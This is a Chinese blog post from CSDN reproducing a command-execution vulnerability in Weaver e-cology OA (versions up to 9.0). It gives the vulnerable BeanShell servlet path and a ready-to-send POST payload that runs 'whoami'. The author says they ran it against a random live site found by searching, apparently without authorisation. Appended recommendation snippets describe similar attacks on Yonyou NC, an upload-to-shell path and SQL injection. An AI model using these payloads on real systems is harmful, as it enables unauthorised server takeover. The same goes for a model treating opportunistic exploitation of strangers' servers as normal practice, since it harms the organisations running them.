记一次对泛微OA命令执行复现

最新推荐文章于 2024-06-06 14:01:55 发布
最新推荐文章于 2024-06-06 14:01:55 发布
阅读量4.8k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41757280/article/details/101198845
版权

最近圈子也是被泛微OA命令执行刷爆了。周一上班划水ing,想着来复现一下,顺便更新下博客。运气好随便搜索了一个就存在漏洞

0x01漏洞描述

泛微OA办公系统是一款协调办公软件。

泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。

0x02漏洞危害

攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。

0x03影响范围

泛微 e-cology<=9.0

0x04漏洞复现

漏洞路径: /weaver/bsh.servlet.BshServlet

poc:bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

访问该站域名加上漏洞路径如果存在,就有漏洞 

 访问后显示这样,点击按钮提交,神器burp抓包。将post内容替换先前的poc

bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

发送

成功复现 

我是超级无敌大废物
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
泛微移动管理平台E-mobile lang2sql接口任意文件上传漏洞
CommputerMac的博客
11-07 4489
e-mobile可满足企业日常管理中的绝大部分管理需求, 诸如市场销售、项目、采购、研发、客服、财务、人事、行政等;同时e-mobile可帮助企业实现面向不同用户量身定制的移动办公入口,包括企业员工、供应商、代理商、 合作伙伴、投资费以及终端客户等整个供应链条上的关系主体,满足为企业全方位的移动办公需求。泛微e-mobile,由高端OA泛微专业研发,是业内领先的移动OA系统,提供移动审批,移动考勤,移动报表,企业微信等丰富办公应用,支持多种平台运行,灵活易用安全性高。
泛微OA与SAP通过webservice方式对接数据完整操作
ywf_1425781533的博客
02-25 6031
Ecology9二次开发
用友NC BeanShell远程命令执行(CNVD-2021-30167)漏洞复现
最新发布
LfanBQX的博客
06-06 512
用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.servlet.BshServlet目录存在远程命令执行漏洞,可通过BeanShell 执行远程命令获取服务器权限。3.网站访问/servlet/~ic/bsh.servlet.BshServlet目录,出现如下页面。2.FOFA上挑选一位存在CNVD-2021-30167漏洞的幸运儿,进行验证。(2)对BeanShell接口添加授权认证机制。貌似所有版本都存在。
泛微OA系统远程命令执行漏洞
chaojixiaojingang
08-21 5915
1.漏洞描述 泛微OA办公系统存在远程命令执行漏洞,由于泛微办公系统的Java Beanshell接口可被未授权,攻击者通过调用该Beanshell接口,构造特定的HTTP请求绕过泛微本身一些安全限制造成远程命令执行,获取服务器完全控制权限。 2.漏洞复现 1)访问泛微办公系统:http://xx.xx.140.21:8090/login/Login.jsp?logintype=1 2)在URL后添加/weaver/bsh.servlet.BshServlet,得到命令执行环境: ...
泛微 流程退回确认操作 js代码
m0_65851123的博客
08-28 337
泛微 流程退回确认提示框 ,流程退回确认 ,方法重写,
JavaScript 阻止程序执行,简单例子
Headmaster_Tan的博客
06-10 837
JavaScript 如何阻止后续代码执行
[泛微OA]流程提交弹出需再次确认提醒框js实现方法
weixin_47191459的博客
04-07 929
提供先进的推理,复杂的指令,更多的创造力。有的重要业务流程提交需要再次点击确认的。提交时候弹出弹出框进行再次确认按钮。
泛微E9流程插入代码块,明细表字段为空提交时报错
reneeyau的博客
06-29 1348
泛微E9流程明细表字段为空提交时报错
泛微OA数据库定时批量备份脚本 批处理对泛微定时备份
08-27
泛微OA(e-office)是一款广泛应用的企业协同办公系统,提供了丰富的功能来帮助企业进行日常管理和流程自动化。在系统运行过程中,数据库中的数据是非常重要的资产,因此定期进行数据库备份是保障业务连续性和数据...
泛微OA 浮点数数据类型更新说明
07-14
泛微OA是一款企业级的协同办公自动化系统,用于提升组织的工作效率和管理水平。在这个系统中,数据的存储和处理是核心功能之一。本文档主要针对泛微OA中涉及的数据库表结构修改,特别是针对浮点数数据类型的更新,...
泛微OA 二次开发指南
10-13
泛微OA ecology 二次开发指南 完整文档说明 一、 ECOLOGY系统框架结构 二、 说明一个JSP页面,一个JAVA程序的基本组成,如何阅读JSP页面 三、 页面权限控制的说明,怎样在页面中引用权限,怎么样新增一个权限,如何在...
泛微OA数据库相关问题处理
02-27
本文将对泛微OA数据库相关问题处理进行详细的介绍,涵盖ORACLE和SQLSERVER两种数据库管理系统。 目录1: ORACLE 归档日志删除方式 ORACLE数据库中的归档日志是数据库的重要组成部分,录了数据库的所有变化情况。...
泛微Js绑定流程各种事件
余大冠子的博客
11-04 2240
按钮单击事件: jQuery("button[name='addbutton0']").click(function(){//绑定明细添加点击事件 var indexnum0=jQuery("#indexnum0").val();//行数 var i=indexnum0-1; }); 文本框事件: jQuery("#field11693").bind("change",function() { }); 浏览框时时事件: jQuery("#field1169
ajax 泛微oa表单js_【泛微OA】付款报销单-检查部门是否填写以及调取明细表预算并计算差额...
weixin_32871457的博客
12-30 583
function changeClick0(){var indexArr = jQuery(“#submitdtlid0”).val().split(“,”);//alert(indexArr.length)for(var aaa=0;aaavar n1 = indexArr[aaa];jQuery(“#field11259_”+n1).bindPropertyChange(function(){...
【漏洞复现泛微E-Mobile 6.0 client.do存在命令执行漏洞
qq_34780861的博客
04-14 808
泛微E-Mobile 6.0爆出存在命令执行漏洞的问题。现在已经确认了这个漏洞可以被攻击者利用,在某些情况下,用户的输入可能被直接传递给底层操作系统的命令执行函数,攻击者可以通过在输入中插入特殊字符或命令序列来欺骗应用程序将其作为有效命令执行,从而获得服务器的命令执行权限。
泛微OA9前台无限制getshell
Jay
06-05 1690
漏洞位于: /page/exportImport/uploadOperation.jsp文件中Jsp流程大概是:判断请求是否是multipart请求,然就没有了,直接上传了,啊哈哈哈哈哈重点关注File file=new File(savepath+filename),Filename参数,是前台可控的,并且没有做任何过滤限制利用非常简单,只要对着127.0.0.1/page/exportImport/uploadOperation.jsp来一个multipartRequest就可以,利用简单,自评高危!!
2021-泛微OA V8 SQL注入漏洞
热门推荐
weixin_43227251的博客
04-13 1万+
泛微OA V8 SQL注入漏洞 漏洞描述 泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 泛微OA V8 FOFA app=“泛微-协同办公OA” 漏洞复现 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)
0xSec
03-20 1万+
泛微e-cology9中存在SQL注入漏洞,未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
泛微oa 代码执行检测脚本
09-21
泛微OA代码执行检测脚本是一种用于发现和防止恶意代码执行的工具。由于泛微OA系统的安全性问题,恶意用户可能会尝试利用漏洞或其他方式执行有害的代码,以获取系统权限或窃取敏感信息。为了保护系统安全,可以使用代码执行检测脚本来进行实时监控和检测。 泛微OA代码执行检测脚本的原理是通过监控系统的代码执行行为,包括程序文件的读写、外部命令执行等,来检测是否存在不正常的行为。一旦发现异常,脚本会录或报警,以便管理员能够及时采取相应的措施。 代码执行检测脚本可以通过监控系统日志、检测可疑文件、对用户输入进行过滤等多种手段来实现。它可以检测到恶意代码执行尝试,如SQL注入、远程命令执行等常见的攻击方式。 此外,代码执行检测脚本还可以结合其他安全措施,如防火墙、入侵检测系统等,共同形成完善的安全防护体系。管理员可以根据脚本的报警信息进行相应的安全策略调整,进一步加固系统的安全性。 总之,泛微OA代码执行检测脚本是一种非常重要的安全工具,可以有效监控和防止恶意代码的执行。它的应用可以提高系统的安全性,保护企业和用户的利益,减少信息泄露和系统被攻击的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值